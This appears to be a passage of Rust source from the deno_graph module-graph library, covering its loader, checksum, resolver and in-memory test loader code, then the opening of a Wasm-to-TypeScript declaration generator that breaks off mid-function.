  type ReadDirEntry = BoxedFsDirEntry;

  // Reading any directory on the null file system yields no entries.
  fn base_fs_read_dir(
    &self,
    _path: &Path,
  ) -> std::io::Result<
    Box<dyn Iterator<Item = std::io::Result<Self::ReadDirEntry>>>,
  > {
    let no_entries = std::iter::empty();
    Ok(Box::new(no_entries))
  }
}
pub mod wasm;
/// The module name appended to a JSX import source pragma when none is
/// otherwise configured (e.g. `react/jsx-runtime`).
pub const DEFAULT_JSX_IMPORT_SOURCE_MODULE: &str = "jsx-runtime";
/// Information that comes from an external source which can be optionally
/// included in the module graph.
#[derive(Debug, Default, Clone, Deserialize, Serialize)]
pub struct CacheInfo {
  /// The path to the local representation of the file. If a local file, the
  /// path to the original file, if a remote file, the path to the file in the
  /// cache.
  pub local: Option<PathBuf>,
}
/// The response that is expected from a loader's `.load()` method.
///
/// The returned specifier is the final specifier. This can differ from the
/// requested specifier (e.g. if a redirect was encountered when loading)
#[derive(Debug, Clone, Deserialize, Serialize, PartialEq, Eq)]
#[serde(tag = "kind", rename_all = "camelCase")]
pub enum LoadResponse {
  /// A module where the content is not available when building the graph, but
  /// will be available at runtime. The module will be marked as
  /// `ModuleKind::External` and no dependency analysis will be performed.
  External { specifier: ModuleSpecifier },
  /// Specifier redirected to another specifier.
  ///
  /// It's important to return the redirects to deno_graph so it
  /// can track them and also tell whether a checksum should be
  /// sent with the load request for JSR dependencies loaded over
  /// HTTPS via a redirect.
  Redirect {
    /// The final specifier of the module.
    specifier: ModuleSpecifier,
  },
  /// A loaded module.
  Module {
    /// The content of the remote module.
    content: Arc<[u8]>,
    /// Last modified time if a file specifier.
    mtime: Option<SystemTime>,
    /// The final specifier of the module.
    specifier: ModuleSpecifier,
    /// If the module is a remote module, the headers should be returned as a
    /// hashmap of lower-cased string values.
    #[serde(rename = "headers", skip_serializing_if = "Option::is_none")]
    maybe_headers: Option<HashMap<String, String>>,
  },
}
/// An error that occurred while loading a module's source.
#[derive(Debug, Error, deno_error::JsError)]
pub enum LoadError {
  /// The loaded content did not match the expected checksum.
  #[class(inherit)]
  #[error(transparent)]
  ChecksumIntegrity(#[from] ChecksumIntegrityError),
  /// Any other loader-defined failure.
  #[class(inherit)]
  #[error(transparent)]
  Other(Arc<dyn JsErrorClass>),
}
/// Result of a load; `Ok(None)` indicates the module could not be found.
pub type LoadResult = Result<Option<LoadResponse>, LoadError>;
/// Future returned by [`Loader::load`].
pub type LoadFuture = LocalBoxFuture<'static, LoadResult>;
/// The response expected from a loader's `ensure_cached` method.
pub enum CacheResponse {
  /// The module is now present in the cache.
  Cached,
  Redirect {
    /// The final specifier of the module.
    specifier: ModuleSpecifier,
  },
}
/// Result of ensuring a module is cached; `Ok(None)` indicates not found.
pub type EnsureCachedResult = Result<Option<CacheResponse>, LoadError>;
/// Future returned by [`Loader::ensure_cached`].
pub type EnsureCachedFuture = LocalBoxFuture<'static, EnsureCachedResult>;
/// Controls how a loader may use its internal cache for a request.
#[derive(Debug, Copy, Clone, PartialEq, Eq)]
pub enum CacheSetting {
  /// Attempts to load a specifier from the cache.
  ///
  /// This is used to see whether the specifier is in the cache for `jsr:` specifiers.
  /// * If it is, then it will use the source provided to get the module information.
  /// * If not, then it will use the manifest information to do resolution and
  ///   issue a separate request to the `load` method in order to get the source.
  Only,
  /// The implementation should prefer using the cache.
  Use,
  /// Loads a specifier where the implementation should not load
  /// from an internal cache. This is only ever done when loading
  /// `jsr:` specifier module information and the version constraint
  /// cannot be resolved.
  Reload,
}
impl CacheSetting {
/// String representation that can be sent to JS for consumption in deno_cache.
pub fn as_js_str(&self) -> &'static str {
// note: keep these values aligned with deno_cache
match self {
CacheSetting::Only => "only",
CacheSetting::Use => "use",
CacheSetting::Reload => "reload",
}
}
}
/// The default JSR registry root URL.
pub static DEFAULT_JSR_URL: Lazy<Url> =
  Lazy::new(|| Url::parse("https://jsr.io").unwrap());
/// Raised when loaded content does not match the expected checksum.
#[derive(Debug, Clone, Error, deno_error::JsError)]
#[class(generic)]
#[error("Integrity check failed.\n\nActual: {}\nExpected: {}", .actual, .expected
)]
pub struct ChecksumIntegrityError {
  /// The checksum computed from the actual content.
  pub actual: String,
  /// The checksum that was expected.
  pub expected: String,
}
/// A SHA-256 checksum to verify the contents of a module
/// with while loading.
// Stored as a hex string (`r#gen` produces lowercase hex via `{:x}`).
#[derive(Debug, Clone, Serialize, Deserialize, PartialEq, Eq, Hash)]
pub struct LoaderChecksum(String);
impl LoaderChecksum {
  /// Wraps an existing checksum string.
  pub fn new(checksum: String) -> Self {
    Self(checksum)
  }

  /// Consumes the checksum, returning the inner string.
  pub fn into_string(self) -> String {
    self.0
  }

  /// Borrows the checksum as a string slice.
  pub fn as_str(&self) -> &str {
    &self.0
  }

  /// Verifies `source` against this checksum, returning an error carrying
  /// both checksums when they differ.
  pub fn check_source(
    &self,
    source: &[u8],
  ) -> Result<(), ChecksumIntegrityError> {
    let actual_checksum = Self::r#gen(source);
    if self.0 != actual_checksum {
      return Err(ChecksumIntegrityError {
        actual: actual_checksum,
        expected: self.0.to_string(),
      });
    }
    Ok(())
  }

  /// Computes the lowercase hex SHA-256 digest of `source`.
  pub fn r#gen(source: &[u8]) -> String {
    use sha2::Digest;
    use sha2::Sha256;
    let mut hasher = Sha256::new();
    hasher.update(source);
    format!("{:x}", hasher.finalize())
  }
}
impl fmt::Display for LoaderChecksum {
  /// Displays the raw checksum string.
  fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
    f.write_str(&self.0)
  }
}
/// Stores and retrieves checksums for remote modules and JSR package
/// manifests (i.e. a lockfile abstraction).
pub trait Locker {
  /// Gets the stored checksum for a remote module, if any.
  fn get_remote_checksum(
    &self,
    specifier: &ModuleSpecifier,
  ) -> Option<LoaderChecksum>;
  /// Whether a checksum is stored for the remote module.
  fn has_remote_checksum(&self, specifier: &ModuleSpecifier) -> bool;
  /// Stores the checksum for a remote module.
  fn set_remote_checksum(
    &mut self,
    specifier: &ModuleSpecifier,
    checksum: LoaderChecksum,
  );
  /// Gets the stored checksum for a package version manifest, if any.
  fn get_pkg_manifest_checksum(
    &self,
    package_nv: &PackageNv,
  ) -> Option<LoaderChecksum>;
  /// Stores the checksum for a package version manifest.
  fn set_pkg_manifest_checksum(
    &mut self,
    package_nv: &PackageNv,
    checksum: LoaderChecksum,
  );
}
/// An in-memory [`Locker`] backed by hash maps.
#[derive(Debug, Default, Clone)]
pub struct HashMapLocker {
  // checksums keyed by remote module specifier
  remote: HashMap<ModuleSpecifier, LoaderChecksum>,
  // checksums keyed by package name + version
  pkg_manifests: HashMap<PackageNv, LoaderChecksum>,
}
impl HashMapLocker {
  /// The stored remote module checksums.
  pub fn remote(&self) -> &HashMap<ModuleSpecifier, LoaderChecksum> {
    &self.remote
  }
  /// The stored package manifest checksums.
  pub fn pkg_manifests(&self) -> &HashMap<PackageNv, LoaderChecksum> {
    &self.pkg_manifests
  }
}
impl Locker for HashMapLocker {
  fn get_remote_checksum(
    &self,
    specifier: &ModuleSpecifier,
  ) -> Option<LoaderChecksum> {
    Some(self.remote.get(specifier)?.clone())
  }

  fn has_remote_checksum(&self, specifier: &ModuleSpecifier) -> bool {
    self.remote.get(specifier).is_some()
  }

  fn set_remote_checksum(
    &mut self,
    specifier: &ModuleSpecifier,
    checksum: LoaderChecksum,
  ) {
    self.remote.insert(specifier.to_owned(), checksum);
  }

  fn get_pkg_manifest_checksum(
    &self,
    package_nv: &PackageNv,
  ) -> Option<LoaderChecksum> {
    Some(self.pkg_manifests.get(package_nv)?.clone())
  }

  fn set_pkg_manifest_checksum(
    &mut self,
    package_nv: &PackageNv,
    checksum: LoaderChecksum,
  ) {
    self.pkg_manifests.insert(package_nv.to_owned(), checksum);
  }
}
/// Options passed to [`Loader::load`] for a single request.
#[derive(Debug, Clone)]
pub struct LoadOptions {
  /// If the specifier being loaded is part of a dynamic branch.
  pub in_dynamic_branch: bool,
  /// If the root specifier building the graph was in a dynamic branch.
  ///
  /// This can be useful for telling if a dynamic load is statically analyzable
  /// where `is_dynamic_branch` is `true` and `was_dynamic_root` is `false`.
  pub was_dynamic_root: bool,
  /// How the loader should interact with its cache for this request.
  pub cache_setting: CacheSetting,
  /// It is the loader's responsibility to verify the provided checksum if it
  /// exists because in the CLI we only verify the checksum of the source when
  /// it is loaded from the global cache. We don't verify it when loaded from
  /// the vendor folder.
  ///
  /// The source may be verified by running `checksum.check_source(content)?`.
  pub maybe_checksum: Option<LoaderChecksum>,
}
/// A trait which allows asynchronous loading of source files into a module
/// graph in a thread safe way as well as a way to provide additional meta data
/// about any cached resources.
pub trait Loader {
  /// The maximum number of redirects allowed.
  fn max_redirects(&self) -> usize {
    10
  }
  /// Whether getting cache info is enabled.
  fn cache_info_enabled(&self) -> bool {
    false
  }
  /// An optional method which returns cache info for a module specifier.
  fn get_cache_info(&self, _specifier: &ModuleSpecifier) -> Option<CacheInfo> {
    None
  }
  /// A method that, given a specifier, asynchronously returns the
  /// source of the file.
  ///
  /// To ensure errors surfaced in the graph are more specific for checksum
  /// integrity errors, ensure this returns a `ChecksumIntegrityError` when
  /// the checksum on `LoadOptions` does not match the loaded source.
  fn load(
    &self,
    specifier: &ModuleSpecifier,
    options: LoadOptions,
  ) -> LoadFuture;
  /// Ensures the specified module is cached.
  ///
  /// By default, this will just call `load`, but you can override
  /// this to provide a more optimal way of caching that doesn't
  /// load the bytes into memory.
  fn ensure_cached(
    &self,
    specifier: &ModuleSpecifier,
    options: LoadOptions,
  ) -> EnsureCachedFuture {
    self
      .load(specifier, options)
      .map(|r| {
        // map through Result<Option<..>>, translating each load response
        // into the corresponding cache response
        r.map(|v| {
          v.map(|r| match r {
            LoadResponse::Redirect { specifier } => {
              CacheResponse::Redirect { specifier }
            }
            LoadResponse::External { .. } | LoadResponse::Module { .. } => {
              CacheResponse::Cached
            }
          })
        })
      })
      .boxed_local()
  }
}
/// Allows caching of analyzed module information alongside a load.
pub trait ModuleInfoCacher {
  /// Cache the module info for the provided specifier if the loader
  /// supports caching this information.
  fn cache_module_info(
    &self,
    specifier: &ModuleSpecifier,
    media_type: MediaType,
    source: &Arc<[u8]>,
    module_info: &ModuleInfo,
  );
}
/// A [`ModuleInfoCacher`] that does nothing.
pub struct NullModuleInfoCacher;
impl ModuleInfoCacher for NullModuleInfoCacher {
  // intentionally a no-op
  fn cache_module_info(
    &self,
    _specifier: &ModuleSpecifier,
    _media_type: MediaType,
    _source: &Arc<[u8]>,
    _module_info: &ModuleInfo,
  ) {
  }
}
impl Default for &dyn ModuleInfoCacher {
  /// Defaults to the no-op cacher.
  fn default() -> Self {
    &NullModuleInfoCacher
  }
}
/// Provides the JSR registry URL and the mapping between package
/// name/versions and registry URLs.
pub trait JsrUrlProvider {
  /// The registry root URL (defaults to `https://jsr.io`).
  fn url(&self) -> &Url {
    &DEFAULT_JSR_URL
  }
  /// The registry URL for a package name and version.
  fn package_url(&self, nv: &PackageNv) -> Url {
    recommended_registry_package_url(self.url(), nv)
  }
  /// Attempts to extract a package name and version from a registry URL.
  fn package_url_to_nv(&self, url: &Url) -> Option<PackageNv> {
    recommended_registry_package_url_to_nv(self.url(), url)
  }
}
impl<'a> Default for &'a dyn JsrUrlProvider {
  fn default() -> &'a dyn JsrUrlProvider {
    &DefaultJsrUrlProvider
  }
}
/// A [`JsrUrlProvider`] using all the trait's default implementations.
#[derive(Debug, Default, Copy, Clone)]
pub struct DefaultJsrUrlProvider;
impl JsrUrlProvider for DefaultJsrUrlProvider {}
/// The recommended way for getting the registry URL for a package.
///
/// This will concat the registry URL with the package name, a slash, then the version.
pub fn recommended_registry_package_url(
  registry_url: &Url,
  nv: &PackageNv,
) -> Url {
  let relative = format!("{}/{}/", nv.name, nv.version);
  registry_url.join(&relative).unwrap()
}
/// The recommended way to get the package name and version from a URL
/// that is found on the registry.
pub fn recommended_registry_package_url_to_nv(
  registry_url: &Url,
  url: &Url,
) -> Option<PackageNv> {
  // the url must be under the registry root
  let relative = url.as_str().strip_prefix(registry_url.as_str())?;
  let relative = relative.strip_prefix('/').unwrap_or(relative);
  // expected path shape: <scope>/<name>/<version>/...
  let mut segments = relative.split('/');
  let scope = segments.next()?;
  let package_name = segments.next()?;
  let raw_version = segments.next()?;
  let name = capacity_builder::StringBuilder::<StackString>::build(|builder| {
    builder.append(scope);
    builder.append('/');
    builder.append(package_name);
  })
  .unwrap();
  let version = deno_semver::Version::parse_standard(raw_version).ok()?;
  Some(PackageNv { name, version })
}
/// An error returned while resolving a specifier.
#[derive(Error, Debug, deno_error::JsError)]
pub enum ResolveError {
  /// The specifier text could not be parsed.
  #[class(type)]
  #[error(transparent)]
  Specifier(#[from] SpecifierError),
  /// An import map lookup failed.
  #[class(inherit)]
  #[error(transparent)]
  ImportMap(#[from] import_map::ImportMapError),
  /// Any other resolver-defined failure.
  #[class(inherit)]
  #[error(transparent)]
  Other(#[from] deno_error::JsErrorBox),
}
/// The kind of resolution currently being done by deno_graph.
#[derive(Debug, Clone, Copy, PartialEq, Eq, Hash)]
pub enum ResolutionKind {
  /// Resolving for code that will be executed.
  Execution,
  /// Resolving for code that will be used for type information.
  Types,
}
impl ResolutionKind {
  /// Whether this is a types resolution.
  pub fn is_types(&self) -> bool {
    matches!(self, ResolutionKind::Types)
  }
}
/// How a specifier should be resolved (ESM vs CommonJS semantics).
#[derive(Debug, Clone, Copy, PartialEq, Eq, Hash, Deserialize, Serialize)]
#[serde(rename_all = "camelCase")]
pub enum ResolutionMode {
  /// Resolving as an ES module.
  Import,
  /// Resolving as a CJS module.
  Require,
}
/// A trait which allows the module graph to resolve specifiers and type only
/// dependencies. This can be use to provide import maps and override other
/// default resolution logic used by `deno_graph`.
pub trait Resolver: fmt::Debug {
  /// An optional method that returns the default JSX import source if one is
  /// configured. If this method returns `Some` and a JSX file is encountered
  /// that does not have an import source specified as a pragma, this import
  /// source will be used instead.
  fn default_jsx_import_source(
    &self,
    _referrer: &ModuleSpecifier,
  ) -> Option<String> {
    None
  }
  /// An optional method that returns the default JSX types import source if one
  /// is configured. If this method returns `Some` and a JSX file is encountered
  /// that does not have an types import source specified as a pragma, this
  /// types import source will be used instead.
  fn default_jsx_import_source_types(
    &self,
    _referrer: &ModuleSpecifier,
  ) -> Option<String> {
    None
  }
  /// An optional method which returns the JSX import source module which will
  /// be appended to any JSX import source pragmas identified.
  fn jsx_import_source_module(&self, _referrer: &ModuleSpecifier) -> &str {
    DEFAULT_JSX_IMPORT_SOURCE_MODULE
  }
  /// Given a string specifier and a referring module specifier, return a
  /// resolved module specifier.
  fn resolve(
    &self,
    specifier_text: &str,
    referrer_range: &Range,
    _kind: ResolutionKind,
  ) -> Result<ModuleSpecifier, ResolveError> {
    // default: plain relative/absolute URL resolution against the referrer
    Ok(resolve_import(specifier_text, &referrer_range.specifier)?)
  }
  /// Given a module specifier, return an optional tuple which provides a module
  /// specifier that contains the types for the module and an optional range
  /// which contains information about the source of the dependency. This will
  /// only be called for module specifiers that are resolved to a non-typed input
  /// (e.g. JavaScript and JSX) and there is not yet types resolved for this
  /// module. Any result will be set on the modules `maybe_types_dependency`
  /// property.
  fn resolve_types(
    &self,
    _specifier: &ModuleSpecifier,
  ) -> Result<Option<(ModuleSpecifier, Option<Range>)>, ResolveError> {
    Ok(None)
  }
}
/// The outcome of resolving a batch of npm package requirements.
#[derive(Debug)]
pub struct NpmResolvePkgReqsResult {
  /// The individual results of resolving the package requirements.
  ///
  /// This MUST correspond to the indexes of the provided package requirements.
  pub results: Vec<Result<PackageNv, NpmLoadError>>,
  /// Result of resolving the entire dependency graph after the initial reqs
  /// were resolved to NVs.
  ///
  /// Don't run dependency graph resolution if there are any individual failures.
  pub dep_graph_result: Result<(), Arc<dyn JsErrorClass>>,
}
/// Integration point for resolving `npm:` package requirements.
#[async_trait(?Send)]
pub trait NpmResolver: fmt::Debug {
  /// This is an optimization for the implementation to start loading and caching
  /// the npm registry package information ahead of time.
  fn load_and_cache_npm_package_info(&self, package_name: &str);
  /// Resolves the package version requirements.
  ///
  /// The implementation MUST return the same amount of resolutions back as
  /// version reqs provided or else a panic will occur.
  async fn resolve_pkg_reqs(
    &self,
    package_req: &[PackageReq],
  ) -> NpmResolvePkgReqsResult;
}
/// Loads a `data:` URL by decoding its contents in memory, producing a
/// module response carrying the decoded bytes and a content-type header.
pub fn load_data_url(
  specifier: &ModuleSpecifier,
) -> Result<Option<LoadResponse>, std::io::Error> {
  let data_url = RawDataUrl::parse(specifier)?;
  let (bytes, mime_type) = data_url.into_bytes_and_mime_type();
  let mut headers = HashMap::new();
  headers.insert("content-type".to_string(), mime_type);
  Ok(Some(LoadResponse::Module {
    specifier: specifier.clone(),
    maybe_headers: Some(headers),
    mtime: None,
    content: Arc::from(bytes),
  }))
}
/// An implementation of the loader attribute where the responses are provided
/// ahead of time. This is useful for testing or
#[derive(Default)]
pub struct MemoryLoader {
  // pre-seeded load responses keyed by specifier
  sources:
    HashMap<ModuleSpecifier, Result<LoadResponse, Arc<dyn JsErrorClass>>>,
  // pre-seeded cache info keyed by specifier
  cache_info: HashMap<ModuleSpecifier, CacheInfo>,
}
/// A convenient description of a pre-seeded [`MemoryLoader`] entry.
pub enum Source<S, C> {
  /// A module with optional headers and content.
  Module {
    specifier: S,
    maybe_headers: Option<Vec<(S, S)>>,
    content: C,
  },
  /// A redirect to another specifier.
  Redirect(S),
  /// An external module (content unavailable at graph time).
  External(S),
  /// A load failure.
  Err(Arc<dyn JsErrorClass>),
}
impl<S: AsRef<str>, C: AsRef<[u8]>> Source<S, C> {
  /// Converts this source description into the result that
  /// [`MemoryLoader`] stores and later returns from its `load` method.
  fn into_result(self) -> Result<LoadResponse, Arc<dyn JsErrorClass>> {
    match self {
      Source::Module {
        specifier,
        maybe_headers,
        content,
      } => Ok(LoadResponse::Module {
        specifier: ModuleSpecifier::parse(specifier.as_ref()).unwrap(),
        mtime: None,
        maybe_headers: maybe_headers.map(|h| {
          h.into_iter()
            // `as_ref()` resolves to `AsRef<str>` via the bound, so the
            // previous `as &str` casts were redundant
            .map(|(k, v)| (k.as_ref().to_string(), v.as_ref().to_string()))
            .collect()
        }),
        // convert the borrowed bytes straight into `Arc<[u8]>` instead of
        // going through an intermediate `Vec` allocation
        content: Arc::from(content.as_ref()),
      }),
      Source::Redirect(specifier) => Ok(LoadResponse::Redirect {
        specifier: ModuleSpecifier::parse(specifier.as_ref()).unwrap(),
      }),
      Source::External(specifier) => Ok(LoadResponse::External {
        specifier: ModuleSpecifier::parse(specifier.as_ref()).unwrap(),
      }),
      Source::Err(error) => Err(error),
    }
  }
}
pub type MemoryLoaderSources<S, C> = Vec<(S, Source<S, C>)>;
impl MemoryLoader {
  /// Creates a loader pre-populated with the provided sources and cache info.
  ///
  /// Panics if any specifier fails to parse as a URL (test-oriented API).
  pub fn new<S: AsRef<str>, C: AsRef<[u8]>>(
    sources: MemoryLoaderSources<S, C>,
    cache_info: Vec<(S, CacheInfo)>,
  ) -> Self {
    Self {
      sources: sources
        .into_iter()
        .map(|(s, r)| {
          let specifier = ModuleSpecifier::parse(s.as_ref()).unwrap();
          (specifier, r.into_result())
        })
        .collect(),
      cache_info: cache_info
        .into_iter()
        .map(|(s, c)| {
          let specifier = ModuleSpecifier::parse(s.as_ref()).unwrap();
          (specifier, c)
        })
        .collect(),
    }
  }

  /// Adds a module with raw byte content and no headers.
  pub fn add_bytes_source(
    &mut self,
    specifier: impl AsRef<str>,
    content: Vec<u8>,
  ) {
    // parse once and reuse for both the map key and the response
    // (previously the specifier was parsed twice)
    let specifier = ModuleSpecifier::parse(specifier.as_ref()).unwrap();
    self.sources.insert(
      specifier.clone(),
      Ok(LoadResponse::Module {
        specifier,
        mtime: None,
        maybe_headers: None,
        content: Arc::from(content),
      }),
    );
  }

  /// Adds an arbitrary [`Source`] entry for the specifier.
  pub fn add_source<S: AsRef<str>, C: AsRef<[u8]>>(
    &mut self,
    specifier: impl AsRef<str>,
    source: Source<S, C>,
  ) {
    let specifier = ModuleSpecifier::parse(specifier.as_ref()).unwrap();
    self.sources.insert(specifier, source.into_result());
  }

  /// Adds an external module entry for the specifier.
  pub fn add_external_source(&mut self, specifier: impl AsRef<str>) {
    self.add_source(
      specifier.as_ref(),
      Source::<_, [u8; 0]>::External(specifier.as_ref().to_string()),
    );
  }

  /// Adds a module with the provided text content and no headers.
  pub fn add_source_with_text(
    &mut self,
    specifier: impl AsRef<str>,
    source: impl AsRef<str>,
  ) {
    self.add_source(
      specifier.as_ref(),
      Source::Module {
        specifier: specifier.as_ref().to_string(),
        maybe_headers: None,
        content: source.as_ref().to_string(),
      },
    );
  }

  /// Registers a JSR package's `meta.json` under the default JSR URL.
  pub fn add_jsr_package_info(
    &mut self,
    name: &str,
    package_info: &JsrPackageInfo,
  ) {
    let specifier = DEFAULT_JSR_URL
      .join(&format!("{}/meta.json", name))
      .unwrap();
    let json_text = serde_json::to_string(package_info).unwrap();
    self.add_source_with_text(specifier, json_text);
  }

  /// Registers a JSR package version's `<version>_meta.json` under the
  /// default JSR URL.
  pub fn add_jsr_version_info(
    &mut self,
    name: &str,
    version: &str,
    version_info: &JsrPackageVersionInfo,
  ) {
    let specifier = DEFAULT_JSR_URL
      .join(&format!("{}/{}_meta.json", name, version))
      .unwrap();
    let json_text = serde_json::to_string(version_info).unwrap();
    self.add_source_with_text(specifier, json_text);
  }
}
impl Loader for MemoryLoader {
  fn get_cache_info(&self, specifier: &ModuleSpecifier) -> Option<CacheInfo> {
    self.cache_info.get(specifier).cloned()
  }
  fn load(
    &self,
    specifier: &ModuleSpecifier,
    _options: LoadOptions,
  ) -> LoadFuture {
    // look up the pre-seeded response; data URLs are decoded on the fly and
    // anything else unknown resolves to `Ok(None)` (not found)
    let response = match self.sources.get(specifier) {
      Some(Ok(response)) => Ok(Some(response.clone())),
      Some(Err(err)) => Err(LoadError::Other(err.clone())),
      None if specifier.scheme() == "data" => {
        load_data_url(specifier).map_err(|e| LoadError::Other(Arc::new(e)))
      }
      _ => Ok(None),
    };
    // everything is in memory, so the future is immediately ready
    Box::pin(future::ready(response))
  }
}
/// A trait which can be used to allow the module graph to report status events
/// to the user.
pub trait Reporter: fmt::Debug + Send + Sync {
  #[allow(unused_variables)]
  /// A handler that is called after each load of a module. It contains the
  /// module specifier of the module that was loaded, and the number of modules
  /// seen (total number of unique specifiers seen), and the number of modules
  /// loaded (where [Loader::load] has been called, and the returned future is
  /// ready).
  fn on_load(
    &self,
    specifier: &ModuleSpecifier,
    modules_done: usize,
    modules_total: usize,
  ) {
  }
  #[allow(unused_variables)]
  /// A handler that is called after each resolution of a package requirement.
  /// It contains the package requirement and the package name and version that
  /// was resolved.
  fn on_resolve(&self, req: &PackageReq, package_nv: &PackageNv) {}
}
/// Resolves the media type and optional charset for a module from its
/// specifier, using the `content-type` header when a header map is provided.
pub fn resolve_media_type_and_charset_from_headers<'a>(
  specifier: &ModuleSpecifier,
  maybe_headers: Option<&'a HashMap<String, String>>,
) -> (MediaType, Option<&'a str>) {
  let content_type = maybe_headers
    .and_then(|headers| headers.get("content-type"))
    .map(String::as_str);
  deno_media_type::resolve_media_type_and_charset_from_content_type(
    specifier,
    content_type,
  )
}
/// Resolves the media type and optional charset from the value of a
/// `content-type` header, falling back to the specifier when no header value
/// is available.
pub fn resolve_media_type_and_charset_from_content_type<'a>(
  specifier: &ModuleSpecifier,
  maybe_content_type: Option<&'a String>,
) -> (MediaType, Option<&'a str>) {
  match maybe_content_type {
    None => (MediaType::from_specifier(specifier), None),
    Some(content_type) => {
      // The first `;`-delimited segment is the mime type itself; any of the
      // remaining parameters may carry a `charset=` value.
      let mut parts = content_type.split(';');
      let media_type = match parts.next() {
        Some(mime) => MediaType::from_content_type(specifier, mime),
        None => MediaType::Unknown,
      };
      let charset = parts
        .map(str::trim)
        .find_map(|part| part.strip_prefix("charset="));
      (media_type, charset)
    }
  }
}
#[cfg(test)]
pub mod tests {
  use super::*;
  use crate::module_specifier::resolve_import;
  use serde_json::json;
  /// Test resolver that answers from fixed `(referrer, specifier)` tables and
  /// falls back to plain import resolution when no mapping matches.
  #[derive(Debug)]
  pub(crate) struct MockResolver {
    map: HashMap<ModuleSpecifier, HashMap<String, ModuleSpecifier>>,
    types: HashMap<ModuleSpecifier, (ModuleSpecifier, Option<Range>)>,
  }
  impl MockResolver {
    // Builds the lookup tables from string pairs; panics on invalid URLs,
    // which is acceptable in test setup.
    pub fn new<S: AsRef<str>>(
      map: Vec<(S, Vec<(S, S)>)>,
      types: Vec<(S, (S, Option<Range>))>,
    ) -> Self {
      Self {
        map: map
          .into_iter()
          .map(|(r, m)| {
            let referrer = ModuleSpecifier::parse(r.as_ref()).unwrap();
            let map = m
              .into_iter()
              .map(|(s, ms)| {
                let specifier_str = s.as_ref().to_string();
                let specifier = ModuleSpecifier::parse(ms.as_ref()).unwrap();
                (specifier_str, specifier)
              })
              .collect();
            (referrer, map)
          })
          .collect(),
        types: types
          .into_iter()
          .map(|(s, (t, ms))| {
            let specifier = ModuleSpecifier::parse(s.as_ref()).unwrap();
            let types_specifier = ModuleSpecifier::parse(t.as_ref()).unwrap();
            (specifier, (types_specifier, ms))
          })
          .collect(),
      }
    }
  }
  impl Resolver for MockResolver {
    fn resolve(
      &self,
      specifier: &str,
      referrer_range: &Range,
      _resolution_kind: ResolutionKind,
    ) -> Result<ModuleSpecifier, ResolveError> {
      // Mapped entries win; otherwise resolve like a normal import.
      if let Some(map) = self.map.get(&referrer_range.specifier)
        && let Some(resolved_specifier) = map.get(specifier)
      {
        return Ok(resolved_specifier.clone());
      }
      Ok(resolve_import(specifier, &referrer_range.specifier)?)
    }
    fn resolve_types(
      &self,
      specifier: &ModuleSpecifier,
    ) -> Result<Option<(ModuleSpecifier, Option<Range>)>, ResolveError> {
      Ok(self.types.get(specifier).cloned())
    }
  }
  // Verifies the serde representation of an external load response.
  #[test]
  fn test_deserialize_load_response() {
    let actual: LoadResponse = serde_json::from_value(
      json!({ "kind": "external", "specifier": "https://example.com/bundle" }),
    )
    .unwrap();
    assert_eq!(
      actual,
      LoadResponse::External {
        specifier: ModuleSpecifier::parse("https://example.com/bundle")
          .unwrap()
      }
    );
  }
}
| rust | MIT | 200a22dbd56b311d490ad00bed57fce34538598e | 2026-01-04T20:22:02.257944Z | false |
denoland/deno_graph | https://github.com/denoland/deno_graph/blob/200a22dbd56b311d490ad00bed57fce34538598e/src/source/wasm.rs | src/source/wasm.rs | // Copyright 2018-2024 the Deno authors. MIT license.
use capacity_builder::StringBuilder;
use indexmap::IndexMap;
use wasm_dep_analyzer::ValueType;
/// Parses the bytes of a Wasm module and renders a `.d.ts` declaration file
/// describing its imports and exports.
pub fn wasm_module_to_dts(
  bytes: &[u8],
) -> Result<String, wasm_dep_analyzer::ParseError> {
  // The generated declarations need the type section, so do not skip it.
  let options = wasm_dep_analyzer::ParseOptions { skip_types: false };
  wasm_dep_analyzer::WasmDeps::parse(bytes, options)
    .map(|deps| wasm_module_deps_to_dts(&deps))
}
/// Renders the parsed Wasm imports/exports as `.d.ts` text.
///
/// Imports are re-exported under synthetic `__deno_wasm_import_<n>__` names so
/// that a missing export in the imported module becomes a type error. Exports
/// whose names are not valid identifiers are declared under
/// `__deno_wasm_export_<i>__` and re-exported with a quoted alias.
fn wasm_module_deps_to_dts(wasm_deps: &wasm_dep_analyzer::WasmDeps) -> String {
  #[derive(PartialEq, Eq)]
  enum TypePosition {
    Input,
    Output,
  }
  // Maps a Wasm value type to TypeScript; i64 accepts `bigint | number` as an
  // input but is produced strictly as `bigint`.
  fn value_type_to_ts_type(
    value_type: ValueType,
    position: TypePosition,
  ) -> &'static str {
    match value_type {
      ValueType::I32 => "number",
      ValueType::I64 if position == TypePosition::Input => "bigint | number",
      ValueType::I64 => "bigint",
      ValueType::F32 => "number",
      ValueType::F64 => "number",
      ValueType::Unknown => "unknown",
    }
  }
  #[cfg(feature = "swc")]
  fn is_valid_ident(export_name: &str) -> bool {
    !export_name.is_empty()
      && deno_ast::swc::ast::Ident::verify_symbol(export_name).is_ok()
  }
  #[cfg(not(feature = "swc"))]
  fn is_valid_ident(_export_name: &str) -> bool {
    // Just assume everything is not valid if not using deno_ast.
    // This should not be a big deal because it just means that
    // this code will quote all the properties.
    false
  }
  let is_valid_export_ident_per_export = wasm_deps
    .exports
    .iter()
    .map(|export| is_valid_ident(export.name))
    .collect::<Vec<_>>();
  // Group named imports by source module while preserving encounter order.
  let mut unique_import_modules: IndexMap<&str, Vec<&str>> =
    IndexMap::with_capacity(wasm_deps.imports.len());
  for import in &wasm_deps.imports {
    let entry = unique_import_modules.entry(import.module).or_default();
    entry.push(import.name);
  }
  StringBuilder::build(|builder| {
    let mut count = 0;
    for (import_module, named_imports) in &unique_import_modules {
      builder.append("import { ");
      // we add the named imports in order to cause a type checking error if
      // the importing module does not have it as an export
      for (i, named_import) in named_imports.iter().enumerate() {
        if i > 0 {
          builder.append(", ");
        }
        builder.append('"');
        builder.append(*named_import);
        builder.append("\" as __deno_wasm_import_");
        builder.append(count);
        builder.append("__");
        count += 1;
      }
      builder.append(" } from \"");
      builder.append(*import_module);
      builder.append("\";\n");
    }
    for (i, export) in wasm_deps.exports.iter().enumerate() {
      let has_valid_export_ident = is_valid_export_ident_per_export[i];
      if has_valid_export_ident {
        builder.append("export ");
      }
      // Writes either the real export name or its synthetic stand-in.
      fn write_export_name<'a>(
        builder: &mut StringBuilder<'a>,
        export: &'a wasm_dep_analyzer::Export<'a>,
        has_valid_export_ident: bool,
        index: usize,
      ) {
        if has_valid_export_ident {
          builder.append(export.name);
        } else {
          builder.append("__deno_wasm_export_");
          builder.append(index);
          builder.append("__");
        }
      }
